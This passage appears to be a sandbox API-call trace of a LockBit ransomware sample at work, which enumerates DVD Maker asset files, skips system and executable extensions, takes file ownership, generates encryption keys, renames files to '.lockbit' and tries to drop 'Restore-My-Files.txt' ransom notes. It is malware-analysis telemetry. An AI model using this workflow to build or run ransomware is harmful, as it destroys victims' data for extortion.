GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=5088) returned 1 [0082.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0082.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0082.217] ReadFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0082.222] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.222] malloc (_Size=0xc0) returned 0x77d800 [0082.222] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0082.223] free (_Block=0x77d800) [0082.223] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0082.223] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0082.223] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.223] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef11f38, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef11f38, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x520150, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0082.223] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0082.223] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0082.223] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0082.223] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.224] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.224] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.224] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.225] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.225] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.225] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.225] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.225] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.225] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.225] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.225] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.226] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.226] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.226] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.226] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.226] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.226] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0082.226] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0082.226] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0082.226] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0082.226] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0082.226] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0082.226] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0082.226] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0082.226] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0082.226] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.226] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.226] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.226] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.226] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.226] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.227] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.227] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.227] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.227] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.227] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.228] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.228] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.228] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.228] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 91 [0082.228] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.228] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.228] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.229] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.229] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.229] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.229] RtlFreeAnsiString (AnsiString="\\") [0082.229] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3ac) returned 0x0 [0082.229] malloc (_Size=0x200) returned 0x77d800 [0082.229] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0082.229] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.229] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.229] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.230] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.230] CloseHandle (hObject=0x3ac) returned 1 [0082.230] free (_Block=0x77d800) [0082.230] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0082.231] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.231] malloc (_Size=0x40068) returned 0x3db00b8 [0082.232] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=3130) returned 1 [0082.232] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0082.232] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.233] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0082.233] ReadFile (in: hFile=0x3ac, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0082.239] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.239] malloc (_Size=0xcc) returned 0x77d800 [0082.239] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xcc, FileInformationClass=0xa) returned 0x0 [0082.240] free (_Block=0x77d800) [0082.240] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0082.240] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0082.240] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.240] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef38095, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef38095, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x520150, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0082.240] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0082.240] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0082.241] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0082.241] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.241] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.241] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.242] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.242] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.242] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.242] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.242] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.242] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.242] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.242] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.242] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.242] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.242] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.242] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.242] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.242] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.242] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.242] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.242] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.242] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.242] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.243] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.243] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.243] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.243] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.243] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.243] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.243] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.243] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.243] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.243] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.243] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0082.243] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0082.243] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0082.243] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0082.243] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0082.243] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0082.243] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0082.243] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0082.244] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png") returned=".png" [0082.244] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.244] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.244] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.244] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.245] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.245] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.245] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.245] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.245] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.245] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.245] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.245] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.245] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.245] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.lockbit") returned 86 [0082.245] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.246] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.246] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.246] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.246] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.247] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.247] RtlFreeAnsiString (AnsiString="\\") [0082.247] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b8) returned 0x0 [0082.247] malloc (_Size=0x200) returned 0x77d800 [0082.247] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0082.247] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.247] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.247] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.248] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.248] CloseHandle (hObject=0x3b8) returned 1 [0082.248] free (_Block=0x77d800) [0082.248] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0082.248] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.248] malloc (_Size=0x40068) returned 0x2031ed0 [0082.248] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=5025) returned 1 [0082.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.249] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0082.284] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0082.284] ReadFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0082.286] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.286] malloc (_Size=0xc2) returned 0x77d800 [0082.286] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0082.287] free (_Block=0x77d800) [0082.287] 